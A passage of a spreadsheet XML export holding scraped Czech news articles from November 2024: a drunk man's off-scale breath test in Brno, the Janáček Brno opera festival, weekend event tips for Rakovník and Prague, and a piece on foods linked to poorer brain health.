1027 hPa Vlhkost: 62 % Rychlost větru: 1 m/s Oblačnost: 93 % Tlak: 1027 hPa Vlhkost: 70 % Rychlost větru: 2 m/s Oblačnost: 73 % Tlak: 1028 hPa Vlhkost: 73 % Rychlost větru: 1 m/s Oblačnost: 2 % Tlak: 1026 hPa Vlhkost: 62 % Rychlost větru: 2 m/s Oblačnost: 8 % Tlak: 1026 hPa Vlhkost: 73 % &amp;lt; &amp;gt; Dozlatova upečená husička, zelí a knedlíky, k tomu sklenka místního piva nebo něčeho ostřejšího. Kolem svátku Martina nabídne svatomartinskou husu...</t>
  </si>
  <si>
    <t>20241101_45_3264689717_557fdfca1fe0a591f001.html</t>
  </si>
  <si>
    <t>557fdfca1fe0a591f001</t>
  </si>
  <si>
    <t>Na opilého muže v Brně nestačil alkoholtester. Výsledek zaskočil i strážníky</t>
  </si>
  <si>
    <t>Shrnutí Na opilého muže v Brně nestačil alkoholtester. Výsledek zaskočil i strážníky Ilustrační fotografie | Zdroj: Koláž Profimedia / Getty Images Kateřina Bártková 1. 11. 2024, 19:24 Do situace, se kterou se při své práci ještě nikdy nesetkali, přivedl ve čtvrtek v poledne dva brněnské strážníky opilý muž. Když se mu snažili naměřit promile alkoholu v krvi, přístroj ukázal chybu. Ne však proto, že by muž předtím nic nevypil, naopak nadýchal příliš mnoho. Alkoholový tester má přitom technické maximum šest promile. Neuvěřitelnou službu zažili ve čtvrtek při poledni brněnští strážníci. Ty přivolal cestující tramvaje v Řečkovicích poté, co viděl opilého muže povalovat se v těsné blízkosti kolejí. Strážníci následně přijeli zkontrolovat čtyřiapadesátiletého opilého muže a s pomocí cestujícího ho odtáhli z blízkosti kolejí. "Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile," uvedl mluvčí strážníků Jakub Ghanem. Strážníci proto ihned zavolali opilci záchranku a během čekání na její příjezd zkusili test ještě jednou. Na podruhé byl pokus úspěšný. " Přístroj zobrazil extrémní hodnotu 5,38 promile , která pro nenavyklého člověka může být i smrtelná. Zdravotníci si muže převzali do své péče a po ošetření ho odvezli do nemocnice," dodal mluvčí. Opilý muž si za svůj čtvrteční abnormální počin vyslouží pokutu až 20 tisíc korun. Podle takzvaného tabákového zákona mu hrozí peněžní sankce za to, že se v opilém stavu zdržoval na nástupišti hromadné dopravy. Polonahý opilec poničil policejní auta. A to v ulici, kde policie sídlí: TN.cz Autor: Kateřina Bártková Autor person Kateřina Bártková</t>
  </si>
  <si>
    <t>514710.00000000006</t>
  </si>
  <si>
    <t>637050</t>
  </si>
  <si>
    <t>20241101_450_3241636062_e69e4cd71c048f85851f.html</t>
  </si>
  <si>
    <t>e69e4cd71c048f85851f</t>
  </si>
  <si>
    <t>Nadupaný Janáček jede bez hranic, představí i „nejšílenější operu“ Jen tři festivaly v České republice stojí ministerstvu kultury za speciální podporu. Ten filmový v Karlových Varech , stálice Pražské jaro a nově také festival Janáček Brno. Ten se v letošním Roku české hudby a při četných janáčkovských výročích, včetně 170 let od narození věhlasného skladatele, koná od tohoto pátku do 24. listopadu na mnoha místech Brna se skutečně bohatým programem. Prestižní operní festival Janáček Brno láká do jihomoravské metropole na třítýdenní multižánrovou nabídku. „Tento operní festival se za dobu své existence vyprofiloval v jedinečnou akci s velkým mezinárodním ohlasem. Právě díky téhle reputaci navázal umělecké spolupráce, které v podmínkách České republiky nemají obdoby,“ zdůvodnil téměř přesně před rokem přímo v Brně příspěvek patnáct milionů korun ministr kultury Martin Baxa ( ODS ). Výběr z programu Leoš Janáček – Výlety páně Broučkovy: slavnostní zahájení festivalu 1. 11., Janáčkovo divadlo Pavel Haas – Šarlatán: 8. 11., Mahenovo divadlo Leoš Janáček – Příhody lišky Bystroušky: 10. 11., Mahenovo divadlo Leoš Janáček – Věc Makropulos: 16. 11., Janáčkovo divadlo Antonín Dvořák – Rusalka: 23. 11., Janáčkovo divadlo Leoš Janáček – Příhody lišky Bystroušky: slavnostní zakončení festivalu 24. 11., Janáčkovo divadlo „Festivalový program se v ročníku 2024 dotkne hvězdných výšin. Pomyslnou laťku kvality se během krátké doby podařilo zvednout na úroveň, která splňuje parametry prvořadé evropské kulturní události,“ dodává k tomu za pořádající Národní divadlo Brno (NdB) jeho ředitel Martin Glaser. A široká nabídka pod heslem Bez hranic! skutečně dokazuje, že přímou dotaci od státu se podařilo zhodnotit. „Jako lidé si hranic stavíme nespočetně, ale cesta do říše fantazie je otevřena všem a hudba, ta žádné hranice nezná,“ zdůvodňuje motto letošního ročníku dramaturgyně Janáčkovy opery Patricie Částková. Umělecký šéf Jiří Heřman přidává, že už když člověk prvně vstoupil na Měsíc, hrála k tomu Novosvětská českého hudebního skladatele Antonína Dvořáka . „S radostí nyní otevíráme interpretační hranice a těšíme se na zážitky z různorodých pohledů na díla našich skladatelů,“ zve Heřman na program letošního ročníku. Speciálně na to, co s operou Leoše Janáčka Výlety páně Broučkovy provedl kanadský režisér Robert Carsen a skotský tenorista Nicky Spence v titulní roli. Nejúžasnější a nejšílenější opera Pro Janáčka netradiční kus na námět ve své době oblíbených novel básníka Svatopluka Čecha zahájí v Janáčkově divadle festival už tento pátek. „Tato opera je rozhodně nejúžasnější, nejpodivnější a nejšílenější dílo, s jakým jsem se kdy setkal, a že jsem jich už několik potkal. Byla to skutečná výzva pro náš tým,“ libuje si elitní janáčkovský režisér Carsen. Navíc u Janáčka se jedná o neobvyklou přítomnost až sršícího humoru, který si z typicky českého človíčka, poživačného domácího Matěje Broučka z Malé Strany, který se ocitne na Měsíci a pak i ve středověké Praze , dělá pořádně nabroušenou legraci. Sám Janáček ke vzniku této opery kdysi napsal v dopise své múze Kamile Stösslové pozoruhodné vysvětlení, proč si vybral právě tento námět. „Tak víte, co to ten Brouček je? Tak zcela všední člověk; hubačí na celý svět a celý svůj život ztápí u džbánku piva . K ničemu dobrému na světě není. Ptáte se: ‚Tak proč jste si takového člověka vybral na operu?‘ Proto, aby se všem zhnusil, aby byl na posměch a aby byl výstrahou! “ píše Janáček , a byť sám velký rusofil, dodává k tomu až neuvěřitelně vizionářsky: „Rusové měli takového ‚měkkého‘ člověka též; jmenoval se Oblomov. Vlastně každý druhý Rus byl Oblomovem – a kam to přivedli! Strašná revoluce teď to potoky krve čistí. Proto Broučka vystavuji – na výstrahu. Je též u nás těch Broučků na všech stranách dost a dost! Jen žaludek je jim vším.“ Stoletá liška či Haasův Šarlatán Operní řada festivalu se věnuje Janáčkově tvorbě opravdu důkladně, a to od prvního úspěchu Její pastorkyně až po dvě vrcholná díla. „Vzácným hostem festivalu bude vynikající soubor Staatsoper Unter den Linden z Berlína , který přiveze skvělou inscenaci Věc Makropulos v režii Clause Gutha,“ hlásí Částková. Mimořádné koncerty Bamberští symfonikové s dirigentem Jakubem Hrůšou : 4. 11., Janáčkovo divadlo ( Josef Suk – Zrání, Antonín Dvořák – Koncert pro klavír a orchestr, Leoš Janáček – Taras Bulba) Orchestr Janáčkovy opery: 15. 11., Mahenovo divadlo ( Leoš Janáček – Houslový koncert „Putování dušičky“, Miloslav Ištvan – Zaklínání času pro dva vypravěče a orchestr, Bohuslav Martinů – Kytice) Staatskapelle Berlín: 17. 11., Janáčkovo divadlo (Samy Moussa – Elysium, Felix Mendelssohn Bartholdy – Koncert pro klavír a orchestr, Arnold Schönberg – Pelleas a Melisande) A druhý kus? „Zdá se to neuvěřitelné, ale opera Příhody lišky Bystroušky oslaví 6. listopadu sté výročí premiéry,“ přidává dramaturgyně a dodává, že svá blahopřání si připravily hned dva soubory. „Za Janáčkovo rodiště to bude zbrusu nová inscenace Moravskoslezského divadla v režii izraelského choreografa Itzika Galiliho a z domovských bílovických lesů inscenace Janáčkovy opery s mimořádnými hosty Kateřinou Kněžíkovou coby Bystrouškou a Adamem Plachetkou jako Revírníkem,“ vyzdvihuje. Čtyřiadvacítka festivalových dnů toho však nabízí mnohem víc. „Vedle pochopitelného důrazu na Janáčkovu tvorbu přinese na koncertech symfonických, komorních i recitálech nejen díla českých skladatelů, jejichž životní data končí až mytickou čtyřkou – Bedřich Smetana , Antonín Dvořák , Leoš Janáček , Josef Suk , ale představí i další autory, kteří formulovali, či naopak záměrně rozostřili pojem české hudby,“ říká muzikolog Jiří Zahrádka. Důraz se klade také na díla židovských autorů, jejichž životy i tvorba byly násilně ukončeny nacistickým běsněním. „Zazní tak především řada děl Janáčkova oblíbeného a nadaného žáka Pavla Haase ,“ zmiňuje brněnského rodáka, jehož v roce 1944 zavraždili v Osvětimi . „V brněnském Mahenově divadle měla v roce 1938 světovou premiéru Haasova jediná opera Šarlatán a tam se také po téměř devadesáti letech vrátí v nové inscenaci souboru opery Národního divadla moravskoslezského v režii Ondřeje Havelky a pod taktovkou Marka Šedivého,“ doplňuje dramaturgyně Částková. Světová tělesa, vily i recepty K obrovským tahákům patří také koncerty Bamberských symfoniků s brněnským dirigentem Jakubem Hrůšou , Staatskapelle Berlín s dirigentem Christianem Thielemannem , ale také hudba v podání nejlepších domácích i zahraničních komorních těles. K velkým bonusům lze podle Zahrádky připočítat rovněž tradiční, ale i neotřelé prostory pro konání koncertů, jako je refektář augustiniánského opatství nebo ikonické brněnské vily Tugendhat , Stiassni či Löw-Beer. Doprovodné výstavy Sté výročí opery Příhody lišky Bystroušky: Výstavu ve vstupní hale Dietrichsteinského paláce tvoří velkoformátové reprodukce dobových dokumentů včetně fotografií z představení a kostýmních návrhů malíře Eduarda Miléna . Věc Janáček : Expozice v Památníku Leoše Janáčka ve Smetanově ulici ukáže, jak Janáčka viděli a zobrazovali výtvarní umělci, ať už skladatelovi současníci, nebo zástupci pozdějších generací. Všechny akce na janacek-brno.cz, ale také na webech Moravského zemského muzea a TIC Brno. „Za koncerty s českou jazzovou hudbou období první republiky můžou návštěvníci festivalu zavítat do brněnských prvorepublikových kaváren,“ dodává Zahrádka. Navíc se po dobu konání festivalu bude ve třinácti brněnských restauracích, kavárnách či cukrárnách podávat jídlo a dezerty podle receptů Janáčkovy hospodyně Marie Stejskalové. Brněnským TIC byla rovněž připravena janáčkovská trasa po městě, kterou lze s mobilní aplikací Loxper celou projít a s heslem získaným na jejím konci obdržet v informačním centru pod krokodýlem odměnu. Ve vile Löw-Beer bude též přístupná výstava originálů ilustrací k Těsnohlídkově knižní předloze Lišky Bystroušky od Venduly Chalánkové . A její kolážový doprovod ke knihám Janáčkovy hospodyně Mářiny paměti a Mářina kuchařka zájemci najdou během otvíracích hodin v kavárně Era od 6. listopadu až do 6. ledna. Lze si též projet či projít místa spojená s Janáčkovým životem v Brně a Hukvaldech , případně po naskenování QR kódů u siluety Janáčka s jeho fenkou Čiperou v ulicích poslouchat z mobilu jeho hudbu. Daniel Matoušek jako Blankytný a Nicky Spence jako Matěj Brouček v inscenaci Výlety páně Broučkovy na pódiu Národního divadla Brno . (2024) Autor: Marek Olbrzymek Nicky Spence a Jan Šťáva v inscenaci Výlety páně Broučkovy na pódiu Národního divadla Brno . (2024) Autor: Marek Olbrzymek Nicky Spence jako Matěj Brouček v inscenaci Výlety páně Broučkovy na pódiu Národního divadla Brno . (2024) Autor: Marek Olbrzymek Festival Janáček Brno připomínající 170 let od narození Leoše Janáčka přiláká v roce 2024 do Brna význačné osobnosti. Autor: Marek Olbrzymek, NdB Režisér Jiří Heřman a dirigent Jakub Hrůša poprvé spojí do jednoho večera dvě vrcholná díla Leoše Janáčka - operu Z mrtvého domu se scénickým ztvárněním Glagolské mše. Autor: Marek Olbrzymek, Národní divadlo Brno Náš světoznámý soubor Pavel Haas Quartet bude jedním z hostů festivalu Autor: Marco Borggreve Scéna z inscenace Janáčkovy opery Z mrtvého domu v podání Velšské národní opery Autor: Clive Barda Scéna z inscenace Janáčkovy Její pastorkyně v podání Velkého divadla Stanisława Moniuszka z Poznaně Autor: Patricie Částková Záběr ze scénického provedení Janáčkova Zápisníku zmizelého v podání belgického souboru Muziektheater Transparant Autor: Patricie Částková Autor: Jana Soukupová Autor Jana Soukupová Rubrika transition_slide Brno - Zprávy</t>
  </si>
  <si>
    <t>20241101_451_3241602249_7b9494189beb9a5f8f01.html</t>
  </si>
  <si>
    <t>7b9494189beb9a5f8f01</t>
  </si>
  <si>
    <t>Denní výběr: Falšování plzeňského piva braníkem z PETky? Lež, brání se hostinská</t>
  </si>
  <si>
    <t>20241101_452_3241602248_08e00e4db96bef23fe9d.html</t>
  </si>
  <si>
    <t>08e00e4db96bef23fe9d</t>
  </si>
  <si>
    <t>20241101_453_3241636294_1a3d296ecf3248f75d2a.html</t>
  </si>
  <si>
    <t>1a3d296ecf3248f75d2a</t>
  </si>
  <si>
    <t>Víkend: Koná se Bitva u Rakovníka 1620 i Beatová nálož</t>
  </si>
  <si>
    <t>Víkend: Koná se Bitva u Rakovníka 1620 i Beatová nálož Křest knihy Plameny na moři KDY: 1. 11. 17:00 KDE: klubovna knihovny, Rakovník ZA KOLIK: vstupné dobrovolné Mladík Ondra Berti pokřtí svoji knižní prvotinu Plameny na moři. Křest bude doprovázet zpěvačka Anička Vitnerová za doprovodu Radky Dědičové. Vernisáž V proudu času KDY: 1. 11. 18:00 KDE: Vinotéka Ve Vysoké, Rakovník ZA KOLIK: Zahájení výstavy obrazů a fotografií s názvem V proudu času autorky Evy Pelcové. Bude víno , bude zpěv - výstavu hudebně podbarví část skupiny Pick - Up Lines. Výstava potrvá do 19. 12. Beatová nálož vol. 3 KDY: 1. 11. 19:00 KDE: Kulturní centrum Rakovník ZA KOLIK: 200 Kč V pátek předvedou svůj „Um“ rovnou 3 partičky! Kladenská Rock'n'roll banda Wicked Dolls, domácí FRET s jejich „Vesnickým Hollywoodem “ a jako zlatý hřeb vystoupí metalová kapela „Jacker's“! Bitva u Rakovníka 1620 KDY: 1. 11. 19:00 - 2. 11. 18:00 KDE: letiště Rakovník ZA KOLIK: Víte, co mají společného Rakovník a Bílá hora ? Přijďte na rakovnické letiště a vše se nejen dozvíte, ale mnohé i zažijete. Ocitnete se v dobovém vojenském táboře, uvidíte vojenský výcvik, dobové lékařství nebo ochutnáte dobovou stravu a z věrné repliky malé polní pevnosti zazní výstřely z kanonu. Nebude chybět ani hlavní bitevní ukázka rekonstruující dobytí nedalekého Šibeničního vrchu. Následující víkend 9. a 10. listopadu 2024 se pak můžete připojit ke kostýmovanému pochodu od Rakovníka na Bílou horu a ověřit si, jak moc mohla tato cesta ovlivnit bojeschopnost stavovského vojska. Mexický festival Día de los Muertos KDY: 2. 11. 11:00 KDE: Osvětová beseda Lužná ZA KOLIK: 100 Kč dospělí, 50 Kč děti Bude pro vás a vaše děti připraven bohatý program, skvělé drinky a jídlo, hudba, workshopy, tanec a mnoho dalšího. Halloween párty KDY: 2. 11. 20:00 KDE: tělocvična ZŠ Řevničov ZA KOLIK: Zahraje kapela Jan Fernet &amp;amp; spol. Nebude chybět vyhlášení nejnápaditější masky (hodnotí tajná porota) - prvních 20 prodaných lístku dostane Halloweenské občerstvení. Halloweenský fotokoutek. Seattle night v Rakovníku KDY: 2. 11. 21:00 KDE: Multižánrový klub Živák, Rakovník ZA KOLIK: 200 Kč 2.11. se Rakovník na jeden večer promění v Seattle . Přijedou totiž Nirvana Revival Praha . Zazní přes 30 songů této legendy, ze 4 kultovních desek Bleach, Nevermind, In Utero a Incesticide. Modlitba za všechny zemřelé KDY: 2. 11. 15:30 KDE: hřbitov Čistá ZA KOLIK: Modlitba za všechny věrné zemřelé proběhne 2. listopadu 2024. Od 15:30 hodin mše svatá v kapli sv. Annycca. v 16:15 hodin pobožnost na hřbitově. Strašidelný podvečer KDY: 2. 11. 17:30 KDE: fotbalové hřiště Šanov ZA KOLIK: vstupné dobrovolné Pro děti budou připravena strašidelná stanoviště s děsivými úkoly a drobnými odměnami. Po splnění úkolů se všichni nachystají na lampionový průvod, který projde do vesnice a zpět na hřiště, kde se budou opékat buřtíky a ve 20:00 budepřekvapení. Vstupné dobrovolné a pro děti opět buřtík a limča jako odměna za stezku odvahy. Horor párty KDY: 1. 11. 20:00 KDE: Náves club Šanov ZA KOLIK: Hraje DJ Jaryn, kostýmy vítány, půlnoční překvapení. Lorem ipsum dolor sit amet… Autor: Josef Rod Autor Josef Rod Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>3470</t>
  </si>
  <si>
    <t>1850</t>
  </si>
  <si>
    <t>20241101_454_3241572021_0d888b94c7eb39239d71.html</t>
  </si>
  <si>
    <t>0d888b94c7eb39239d71</t>
  </si>
  <si>
    <t>Tipy na víkend v Praze: Návštěvnické centrum ČNB po setmění, Světla vyprávěji nebo Día de Muertos 2024</t>
  </si>
  <si>
    <t>Tipy na víkend v Praze : Návštěvnické centrum ČNB po setmění, Světla vyprávěji nebo Día de Muertos 2024 Už víte, kam vyrazíte o víkendu? Pokud se stále rozmýšlíte, máme pro vás několik tipů na zajímavé zážitky v Praze . Návštěvnické centrum ČNB po setmění 2. listopadu Česká národní banka (ilustrační foto) | foto: Zuzana Jarolímková , iROZHLAS.cz Co se v Návštěvnickém centru děje, když odejdou poslední návštěvníci? Prozradíme vám tajemství, naše expozice utichne, ale nespí. Naopak! Za tmy se probouzí mnoho prvků našich platidel, která v běžném světle neuvidíte, zlaté poklady se rozzáří v celé své kráse a ještě více vynikne dlouhá a poutavá historie budovy, ve které Česká národní banka sídlí. Chcete to vše vidět na vlastní oči? Kdy jindy než v nadcházejícím halloweenském a dušičkovém období. Dorazte v sobotu 2. listopadu na speciální akci Návštěvnické centrum ČNB po setmění a zjistěte, jak ožívají bankovky pod UV světlem, nechte se oslnit zářící vysokohmotnostní zlatou mincí a nasajte tajemnou atmosféru potemnělého trezoru. Čekat vás budou nejen naše expozice v nevšedním dušičkovém hávu, ale také mnoho tematických aktivit. Těšit se můžete na kreativní workshopy, kde si budete moct vyrobit svíticí obrazy či vlastní strašidelné placky, tematické hry založené na hře světel, soutěže o ceny, kvízy, šifry a samozřejmě i mnohé zajímavosti ze světa peněz a naší ekonomiky. Akce bude probíhat v sobotu 2. 11. 2024 v pražských expozicích Návštěvnického centra. Začínat bude v 18.00 a potrvá do 22.00. Naváže na běžný sobotní program Návštěvnického centra, takže pokud chcete vidět naše expozice za světla i za tmy, dorazte už dříve. Strašidelné kostýmy jsou vítány! Více ZDE Světla vyprávějí ve Žlutých lázních Vesmírný park 1. listopadu 2024 až 31. ledna 2025 Světla vyprávějí ve Žlutých lázních | foto: Simona Fialová , Světla vyprávějí Objevte fascinující svět vesmíru v jedinečné světelné expozici Vesmírný park Praha , která vás uchvátí půl milionem světýlek. V areálu Žluté lázně na břehu Vltavy na vás čekají obří světelné planety, rakety, astronauti i létající talíře. Tato unikátní výstava, vytvořená ve spolupráci s předními českými astronomy, vás provede záhadami vesmíru – od planet sluneční soustavy po černé díry a souhvězdí. Děti se mohou těšit na zábavnou stezku vesmírem s postavičkou pohádkového Zvonka. Zábava i poznání pro rodiny s dětmi i dospělé – vesmír nikdy nebyl tak blízko! Více ZDE Día de Muertos 2024 2.11.2024, 10:00 – 3.11.2024, 21:00 Náprstkovo muzeum Dia de Muertos v Náprstkově muzeu | foto: Jana Myslivečková , Český rozhlas Zveme vás na další ročník mexického festivalu Día de Muertos (Den mrtvých), který proběhne ve dnech 2. a 3. listopadu 2024 na nádvoří muzea. Tento festival, organizovaný ve spolupráci s mexickým kolektivem „Día de Muertos“ a dalšími partnery, přináší do Prahy tradiční oslavy jednoho z nejdůležitějších mexických svátků. Letošní ročník nabídne pestrý program, který oslavuje hluboké kořeny mexické komunity, a zároveň posiluje kulturní vazby mezi Mexikem a Českou republikou . Týdenní slavnosti začínají již 25. října a jejich program zahrnuje divadelní představení, umělecké výstavy, filmové projekce a mnoho dalšího. Hlavní oslavy (2.–3. listopadu), které vyvrcholí v Náprstkově muzeu , nabídnou pestrý mix aktivit pro všechny věkové kategorie. Můžete se těšit na: Tradiční oltáře (Ofrendas): bohatě zdobené oltáře na počest zesnulých. Dílny a rodinné aktivity: zdobení masek, Wixarika korálkové umění, tvoření papel picado a malování na obličej. Živá vystoupení: Mariachi hudba, tradiční tance od Mestizo Ballet z Londýna , regionální mexická hudba od Tonalli z Vídně a další. Soutěž o nejlepší Catrinu: přijďte oblečeni jako Catrina a soutěžte o výhru! Piñata pro děti: neděle plná zábavy s piñatami pro děti. Mexičtí řemeslníci: Ručně vyráběné zboží a tradiční výrobky. Průvod: Veselý průvod, který projde Betlémským náměstím a centrem Prahy , oslaví život, smrt a ducha komunity. Vstupné na festival na nádvoří muzea je ZDARMA . Více ZDE Výstava dýní v Botanické zahradě Praha od 11. října do 3. listopadu Výstava dýní v botanické zahradě v Troji 2024 | foto: Jana Myslivečková , Český rozhlas Letošní výstava je inspirována oslavami Día de los Muertos , tradičním mexickým svátkem, který ctí památku zesnulých a oslavuje život. Tuto atmosféru přenesou do zahrady strašidelné lebky, kostlivci a další mexické motivy. Čtěte také OBRAZEM: Symboly a barevné plody. Motivem výstavy dýní v pražské botanické zahradě v Troji je mexický svátek Výstavu bude tradičně provázet i bohatý tvořivý víkendový program. První víkend 12. a 13. října jsou připraveny Kreativní dílničky v duchu Mexika . O víkendu 19. a 20. října si užijete Dýňové hrátky a během posledního říjnového víkendu 26. a 27. října u nás budete moci dlabat dýně nebo si vyrobit dýňové lucerny. Program bude probíhat v krytém výstavním sále, tedy za každého počasí. Celou výstavu završí 31. října oslavy Halloweenu a večerní lampionový průvod zahradou. Více ZDE Rezervace a informace ZDE Výstava Czech Press Photo do 30. listopadu Čtěte také Soutěž Czech Press Photo vyhrál snímek roztržky u soudu. Bylo to o velkém štěstí, komentuje fotografii autor Roman Vondrouš V Nové budově Národního muzea můžete navštívit výstavu již 29. ročníku prestižní novinářské soutěže Czech Press Photo . Prezentovány jsou oceněné snímky a další vybrané fotografie, které charakterizují uplynulý rok. Celkem je k vidění více než 470 tištěných fotografií a více než 240 snímků v obrazovkách a projekcích od 120 autorů. Součástí výstavy bude bohatý doprovodný program. Rádiová stezka Praha – Satalice Čtěte také Rádiová stezka v Satalicích . Místní gymnazisté oživují historii vysílání a vytvořili naučnou stezku Studenti 1. IT Gymnázia v Satalicích vytvořili naučnou stezku na počest rádiové historie. Vysílání začalo 18. května 1923 ve stanu v pražských Kbelích a v sousedních Satalicích byla vybudována rádiová stanice. Dnes v budově sídlí právě zmíněné gymnázium a trasa vede kolem něj parkem. Projít si ji může kdokoli, má osm zastávek a vznikla k ní i aplikace. Autor: Jana Myslivečková Autor Jana Myslivečková Rubrika transition_slide Tipy na výlet</t>
  </si>
  <si>
    <t>75630</t>
  </si>
  <si>
    <t>75210</t>
  </si>
  <si>
    <t>20241101_455_3241652074_20a7ca1f4ff285f31280.html</t>
  </si>
  <si>
    <t>20a7ca1f4ff285f31280</t>
  </si>
  <si>
    <t>Jezte raději sardinky, říká studie. Jaké potraviny se vyplatí omezit pro ochranu mozku: 7 hrozeb pro kognitivní funkce</t>
  </si>
  <si>
    <t>Jezte raději sardinky, říká studie. Jaké potraviny se vyplatí omezit pro ochranu mozku: 7 hrozeb pro kognitivní funkce Udržet zdraví mozku je stejně důležité jako pečovat o jakýkoli jiný orgán. Mnohé z potravin, které konzumujeme pravidelně, mohou ovlivnit paměť, soustředění i náladu a v dlouhodobém horizontu zvýšit riziko kognitivních onemocnění. Zde je přehled sedmi potravin, kterým se vyplatí vyhýbat, abychom chránili své mozkové zdraví. Zdraví | Kristina Vacková | 1. 11. 2024 Náš mozek je potřeba udržet v kondici . Pro zdraví mozku a duševní pohody se tedy vyplatí nejen pečlivě volit potraviny , ale také vědět, které z nich omezit či úplně vynechat. A my se podíváme, které potraviny dle několika vědeckých studií našemu mozku škodí. Zřejmě vás překvapí, že dravé mořské ryby škodí našemu mozku více než sardinky, losos nebo makrela, jak ukázala nová studie . 1. Slazené nápoje a zpracované cukry Cur je bílý zabiják . Konzumace nápojů s přidaným cukrem , jako jsou limonády, může zvýšit riziko kognitivních poruch, včetně demence. Studie ukazují, že konzumace nadměrného množství cukru má negativní vliv na paměť a může také narušit fungování mozkových buněk, čímž přispívá k dlouhodobému riziku demence . Udržujte příjem cukru pod kontrolou a zkuste místo toho zvolit přírodní sladidla, jako je stevie, nebo malé množství medu. 2. Trans tuky v zpracovaných potravinách Trans tuky jsou spojovány s vyšším rizikem zánětů v mozku a mohou snižovat schopnost mozku regenerovat a tvořit nové synapse . Podle této studie jsou trans tuky často přítomny v ultrazpracovaných potravinách, jako jsou hot dogy, hamburgery a různé druhy sušenek . I další výzkumy ukázaly, že vyšší konzumace trans tuků vede k horším výsledkům v testech paměti a myšlení . Při nákupu vybírejte potraviny bez trans tuků a zvolte zdravější tuky, jako jsou omega-3 mastné kyseliny z ryb nebo avokádový olej . 3. Alkohol a jeho vliv na kognitivní funkce Alkohol v mírném množství může být společenskou záležitostí, ale nadměrná konzumace je pro mozek riziková . Chronický alkoholismus může způsobit zmenšení objemu mozkové tkáně a snížit schopnost mozkových buněk se obnovovat, podle nových studií přispívá také ke vzniku demence. Dlouhodobé pití alkoholu může vést k neurodegenerativním změnám a zvýšit riziko výskytu Wernicke-Korsakoffova syndromu , což je stav spojený s těžkými poruchami paměti a orientace. Pokud chcete alkohol konzumovat zdravěji, dodržujte limity jednoho nápoje denně pro ženy a dvou pro muže. 4. Rtuť v dravých mořských rybách Rtuť se může vyskytovat v mořských rybách, zejména v dlouhověkých dravých druzích jako je tuňák, žralok nebo mečoun. Tento těžký kov má neurotoxické účinky a jeho dlouhodobé hromadění v těle může vést k poškození centrálního nervového systému. Vědci v nové studii doporučují zaměřit se na menší ryby s nízkým obsahem rtuti, jako jsou sardinky, losos nebo makrela , ideálně v oleji, které poskytují omega-3 mastné kyseliny podporující zdraví mozku bez rizika spojeného s rtutí. A právě v již zmíněném novém výzkumu vědci měřili v krvi koncentrace kyselin, polynenasycených mastných kyselin omega-3 s dlouhým řetězcem, které se v největším množství vyskytují v tučných rybách. Poté pomocí magnetické rezonance mozku změřili objem mozku účastníků. Porovnáním koncentrace omega-3 s těmito ukazateli mozku a také s kognitivními funkcemi, jako je paměť a uvažování, výzkumníci zjistili souvislost mezi vyšším obsahem omega-3 a větším objemem mozku a lepšími kognitivními schopnostmi. Stárnutí mozku můžeme zpomalit . Jak víme, lidský mozek se skládá převážně z tuku. „Z jednotlivých mastných kyselin se v mozku nachází ve vysokém množství zejména DHA. DHA hraje důležitou roli v buněčných membránách naší mozkové tkáně a může být důležitá i pro zdraví nervů, protože pomáhá hladkému toku signálů v těle,“ říká doktorka Kaitlin Rokeová , výzkumná pracovnice a ředitelka vědecké komunikace a osvěty v Globální organizaci pro EPA a DHA Omega-3. „EPA je také velmi důležitá pro zdravotní funkce mozku a metabolické procesy,“ dodává. 5. Potraviny s vysokým obsahem soli Nadměrná konzumace soli může způsobit vysoký krevní tlak, což negativně ovlivňuje mozkový krevní oběh a může vést k cévním onemocněním a mozkové mrtvici . Výzkum ukazuje, že snižování soli může zlepšit kognitivní funkce, zejména u starších dospělých, a pomoci tak snížit riziko demence. Místo soli se zkuste při vaření zaměřit na koření jako je kurkuma nebo česnek, které mají také protizánětlivé účinky. 6. Aspartam a umělá sladidla Aspartam, často používaný v dietních nápojích a „nízkokalorických“ potravinách, je umělé sladidlo, které může mít vliv na produkci neurotransmiterů a zvýšit stresové hormony v mozku. Dřívější výzkum tvrdil, že nadměrná konzumace aspartamu může ovlivnit náladu a paměť, a proto je lepší se mu pokud možno vyhýbat, ale novější studie tuto spojitost neuvádějí. Pokud chcete omezit příjem cukru, zkuste přírodní alternativy. 7. Ultra zpracované potraviny Ultra zpracované potraviny jsou skutečně obří zlo. Instantní nudle, brambůrky nebo instantní polévky mohou být pro náš mozek toxické kvůli vysokému obsahu konzervantů a nízké nutriční hodnotě. Tyto potraviny podporují ukládání viscerálního tuku, který je spojen s poškozením mozkové tkáně. Studie spojují vysoký příjem zpracovaných potravin s horšími výsledky testů paměti a kognitivních funkcí . Vyhýbejte se jim a zaměřte se na čerstvé (super)potraviny bohaté na vlákninu, ovoce a zeleninu, které mají na mozek pozitivní vliv. Jak chránit mozek: Zaměřte se na čerstvou a pestrou stravu Snížení konzumace těchto škodlivých potravin může mít významný vliv na vaše mozkové zdraví a dlouhodobé kognitivní funkce. Zaměřte se na středomořskou stravu, která je bohatá na zeleninu, ořechy, celozrnné produkty a zdravé tuky, které podporují správnou funkci mozku. Mozek je životně důležitý orgán, který si zaslouží péči a podporu ve všech životních obdobích. Některé potraviny mohou být lákavé pro svou chuť a snadnost přípravy, ale jejich častá konzumace může mít na mozek nepříznivé účinky. Zkuste nahradit nezdravé možnosti potravinami, které podporují mozkovou činnost, jako jsou celozrnné produkty, ořechy a zelenina. I drobné změny ve stravě mohou pomoci dlouhodobě chránit váš mozek a podpořit kvalitní a plnohodnotný život. Čtěte také: Zázrak jménem rybí tuk: Jaké má přínosy pro tělo a proč ho jíst? Zdroj článku Eatthis.com , FeelGoodPal.com, Criticalnutritionlabs.com, studie Doporučená videa z partnerského webu z Lifee.cz : zdrave potraviny nezdrave potraviny mozek ZDRAVÍ Autor: Kristina Vacková Autor person Kristina Vacková</t>
  </si>
  <si>
    <t>20241101_456_3241566641_bcf612a4b91fbf10ceb7.html</t>
  </si>
  <si>
    <t>bcf612a4b91fbf10ceb7</t>
  </si>
  <si>
    <t>TIPY NA VÍKEND: Bitva u Rakovníka, výlov Vyžlovského rybníka nebo Pivní a vinné slavnosti</t>
  </si>
  <si>
